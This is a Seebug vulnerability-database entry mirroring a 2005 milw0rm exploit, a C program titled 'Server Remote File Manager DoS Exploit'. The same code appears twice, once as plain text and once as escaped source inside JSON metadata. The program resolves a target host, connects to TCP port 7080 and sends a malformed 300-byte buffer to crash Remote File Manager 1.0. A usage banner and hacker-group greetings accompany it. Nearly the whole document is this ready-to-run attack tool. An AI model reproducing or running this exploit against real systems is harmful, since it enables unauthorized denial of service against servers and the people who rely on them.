ID SSV:15560
Type seebug
Reporter Root
Modified 2005-05-08T00:00:00
Description
No description provided by source.
/*
Server Remote File Manager DoS Exploit
-------------------------------------------
INFGP - Hacking&security Research
[+] Attacking localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost : Disconected!
Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300
int main (int argc, char *argv[]){
char req[] =
"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&"
"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?"
"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
"KG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
"qv#trog.ro#mkodph>qv#trog.ro#mkodph\n";
unsigned int rc,addr,inetsock ;
struct sockaddr_in tcp;
struct hostent * hp;
WSADATA wsaData;
char buffer[size];
memset(buffer,'A',300);
memcpy(buffer,req,25);
if(argc < 2) {
printf("\n\n Server Remote File Manager DoS Exploit \n", argv[0]);
printf(" -----------------------------------------\n", argv[0]);
printf(" INFGP - Hacking&Security Research\n\n", argv[0]);
printf("[-]Usage: %s [target]\n", argv[0]);
printf("[?]Exam: %s localhost \n", argv[0]);
exit(-1) ;
}
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!inetsock){
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
tcp.sin_port=htons(7080);
printf("\n[+] Attacking %s..\n" , argv[1]) ;
printf("[+] Build DOS string\n");
Sleep(1000);
printf("[+] Buffer size = %d byte\n" , sizeof(buffer));
rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] Sending bad format..\n") ;
send(inetsock , buffer , sizeof(buffer) , 0);
printf("[+] %s : Disconected! \n\n" , argv[1]) ;
}
else {
printf("[-] Port :7080 is invalid.Server not connected!\n");
}
}
// milw0rm.com [2005-05-08]
{"href": "https://www.seebug.org/vuldb/ssvid-15560", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2005-05-08T00:00:00", "title": "Remote File Manager 1.0 Denial of Service Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-15560", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2005-05-08T00:00:00", "sourceData": "\n /*\r\n\r\n Server Remote File Manager DoS Exploit\r\n-------------------------------------------\r\n INFGP - Hacking&security Research\r\n\r\n[+] Attacking localhost..\r\n[+] Build DOS string\r\n[+] Buffer size = 300 byte\r\n[+] Sending bad format..\r\n[+] localhost : Disconected!\r\n\r\nGreats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,\r\nThomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,\r\nJasakom,ECHO,etc..betst reagrds t0 whell.\r\nInfo: 98.to/infamous\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <winsock2.h>\r\n#pragma comment(lib, "ws2_32.lib")\r\n#define size 300\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nchar req[] =\r\n"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\\?X.JIY.HS&"\r\n"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\\?"\r\n"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"\r\n"KG&MKL\\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"\r\n"qv#trog.ro#mkodph>qv#trog.ro#mkodph\\n";\r\n\r\n unsigned int rc,addr,inetsock ;\r\n struct sockaddr_in tcp;\r\n struct hostent * hp;\r\n WSADATA wsaData;\r\n char buffer[size];\r\n\r\n memset(buffer,'A',300);\r\n memcpy(buffer,req,25);\r\n\r\n if(argc < 2) {\r\n printf("\\n\\n Server Remote File Manager DoS Exploit \\n", argv[0]);\r\n printf(" -----------------------------------------\\n", argv[0]);\r\n printf(" INFGP - Hacking&Security Research\\n\\n", argv[0]);\r\n printf("[-]Usage: %s [target]\\n", argv[0]);\r\n printf("[?]Exam: %s localhost \\n", argv[0]);\r\n exit(-1) ;\r\n }\r\n\r\n if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){\r\n printf("WSAStartup failed !\\n");\r\n exit(-1);\r\n }\r\n hp = gethostbyname(argv[1]);\r\n if (!hp){\r\n addr = inet_addr(argv[1]);\r\n }\r\n if ((!hp) && (addr == INADDR_NONE) ){\r\n printf("Unable to resolve %s\\n",argv[1]);\r\n exit(-1);\r\n }\r\n inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n if (!inetsock){\r\n printf("socket() error...\\n");\r\n exit(-1);\r\n }\r\n if (hp != NULL)\r\n memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);\r\n else\r\n tcp.sin_addr.s_addr = addr;\r\n\r\n if (hp)\r\n tcp.sin_family = hp->h_addrtype;\r\n else\r\n tcp.sin_family = AF_INET;\r\n\r\n tcp.sin_port=htons(7080);\r\n\r\n printf("\\n[+] Attacking %s..\\n" , argv[1]) ;\r\n printf("[+] Build DOS string\\n");\r\n Sleep(1000);\r\n printf("[+] Buffer size = %d byte\\n" , sizeof(buffer));\r\n rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));\r\n if(rc==0)\r\n {\r\n\r\n Sleep(1000) ;\r\n printf("[+] Sending bad format..\\n") ;\r\n send(inetsock , buffer , sizeof(buffer) , 0);\r\n printf("[+] %s : Disconected! \\n\\n" , argv[1]) ;\r\n}\r\n else {\r\n printf("[-] Port :7080 is invalid.Server not connected!\\n");\r\n}\r\n}\n\n// milw0rm.com [2005-05-08]\n\n ", "id": "SSV:15560", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T22:34:51", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2017-11-19T22:34:51"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "references": []}
{}